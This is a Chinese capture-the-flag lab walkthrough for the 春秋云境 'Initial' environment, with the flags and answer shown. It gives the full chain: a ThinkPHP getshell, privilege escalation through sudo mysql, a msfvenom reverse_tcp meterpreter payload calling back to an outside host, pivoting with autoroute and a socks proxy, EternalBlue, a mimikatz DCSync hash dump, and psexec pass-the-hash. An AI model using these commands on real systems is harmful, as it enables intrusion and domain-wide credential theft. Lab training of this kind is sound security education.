春秋云境Initial

M00NK1D
252 阅读3分钟

image.png

Initial

IP地址:39.99.131.46

Flag第一部分

  • 先使用nmap对IP地址进行扫描:nmap -sV -Pn 39.99.131.46 Untitled.png

  • 开启了80端口,从浏览器访问IP地址 Untitled 1.png

  • 先使用BurpSuite对用户名密码进行爆破,发现都显示页面404,无法登录。 Untitled 2.png Untitled 3.png

  • 通过页面图标判断是ThinkPHP架构,使用ThinkPHP工具进行验证,发现存在漏洞,使用工具进行GetShell。 Untitled 4.png

  • 使用蚁剑添加shell Untitled 5.png

  • 使用文件管理功能查看root目录,发现权限不够 Untitled 6.png

  • 使用命令行查看当前用户和权限 Untitled 7.png

  • 尝试sudo提权,使用sudo -l查看,发现mysql命令不需要密码 Untitled 8.png

  • 查询使用方法 Untitled 9.png

  • 构造命令:sudo mysql -e ‘! find / -name *flag’ 来查看flag文件 Untitled 10.png

  • 构造命令:sudo mysql -e ‘! ls /root/flag’ 查看文件夹 Untitled 11.png

  • 构造命令:sudo mysql -e ‘! cat /root/flag/flag01.txt’ 来查看文件flag01.txt,找到第一部分flag: flag{60b53231- Untitled 12.png

Flag第二部分

  • 上传fscan到目标主机 Untitled 13.png

  • 在命令行查看网络信息,发现内网IP地址:172.22.1.15/16 Untitled 14.png

  • 使用chmod 777 fscan_amd添加执行权限,使用./fscan_amd64 -h 172.22.1.0/24进行扫描,发现三个存活主机:172.22.1.2,172.22.1.18,172.22.1.21,对三个网址进行扫描 Untitled 15.png Untitled 16.png Untitled 17.png

  • 获取信息:

172.22.1.2172.22.1.2 (Windows Server 2016 Datacenter 14393)
172.22.1.18:WebTitle: [http://172.22.1.18?m=login](http://172.22.1.18/?m=login) code:200 len:4012   title:信呼协同办公系统
172.22.1.21172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)

  • 使用msf工具,msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=120.27.227.99 LPORT=3333 -f elf**>**15.elf创建木马,通过蚁剑上传木马 Untitled 18.png Untitled 19.png

  • 启动msfconsole,创建监听器,并上线39.99.131.46主机

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LPORT 3333
set LHOST 120.27.227.99
exploit

Untitled 20.png Untitled 21.png Untitled 22.png

  • 添加路由
run autoroute -p
run get_local_subnets
run post/multi/manage/autoroute
run autoroute -p

Untitled 23.png

  • 创建代理
use auxiliary/server/socks_proxy
set srvport 2222
run

Untitled 24.png

  • 使用Proxifier连接代理访问172.22.1.0/24网段 Untitled 25.png Untitled 26.png

  • 网上搜索OA的exp文件,对其进行攻击,并添加到蚁剑中 Untitled 27.png Screenshot_2023-12-14_at_11.44.25.png Untitled 28.png

  • 使用命令行查看当前用户权限 Untitled 29.png

  • 搜索文件系统,在C:/Users/Administrator/flag/flag02.txt发现flag文件,找到第二部分flag:2ce3-4813-87d4- Untitled 30.png

Flag第三部分

  • 接下来对172.22.1.21主机进行攻击

  • 使用ms17_010扫描模块确认存在永恒之蓝漏洞 Untitled 31.png

  • 使用永恒之蓝模块进行攻击,获取172.22.1.21主机shell

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

  • DCSyncmimikatz2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service**(DRS) 服务的** GetNCChanges 接口模仿一个域控制器向另 一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash**。**

  • 加载kiwi模块,抓取hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

Untitled 33.png

  • 发现Administrator用户的Hash:10cf89a850fb1cdbe6bb432b859164c8

  • 攻击域控主机172.22.1.2

  • 使用impacket工具中的psexec.py反弹shell,成功获取域控主机shell

python3 psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG/administrator@172.22.1.2

Screenshot_2023-12-14_at_12.16.52.png

  • 浏览文件,在User\Administrator\flag文件夹下找到flag03.txt文件,查看flag03.txt文件,找到第三部分flag:e8f88d0d43d6} Untitled 34.png

  • 完整flag:flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

avatar
文章
阅读
粉丝